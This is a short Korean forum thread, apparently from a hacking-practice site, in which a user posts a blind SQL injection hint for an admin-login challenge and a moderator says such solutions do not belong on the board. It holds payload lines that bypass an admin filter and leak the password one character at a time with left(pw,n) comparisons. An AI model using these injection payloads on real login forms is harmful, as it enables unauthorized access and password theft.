FREE
 
 
공지 게시판에 글 쓰기 가능
NO
568
WRITER
aja
DATE
2018-03-07
COUNT
335
www.google.co.kr/search?biw=360&bih=512&ei=Eu2fWuDBC4ry8AXv_YuYCA&q=admin+필터링+우회&oq=admin+필터링+우회&gs_l=mobile-gws-serp.12...0.0..120158...0....0.0.............mobile-gws-wiz-serp.8eArlnLDrEo%
 
aja
2018-03-07 오후 10:56:27
@두부 참조요!
aja
2018-03-07 오후 11:08:11

1st. attack

id : [어드민 필터링 우회 내용] and left(pw,1)='*'--
pw : 1
OK admin

2nd. attack

id : [어드민 필터링 우회 내용] and left(pw,2)='**'--
pw : 1
OK admin
aja
2018-03-07 오후 11:17:49
cf. choiys.tistory.com
xiphias
2018-03-08 오후 10:12:41
헉. 풀이를 여기에 적으시면 곤란합니다. ㅎㅎ
aja
2018-03-09 오전 12:14:06
이렇게 detail하게 설명해 줘도 SQL Injection 공격 방법에 대해 제대로 이해하지 못한 사람에게는 별다른 소용이 없을 것 같습니다.
xiphias
2018-03-09 오후 12:41:53
게시판 오류 알려주셔서 감사합니다. ^^
이 게시글은 잠시 비밀글로 설정하였다가 삭제하겠습니다.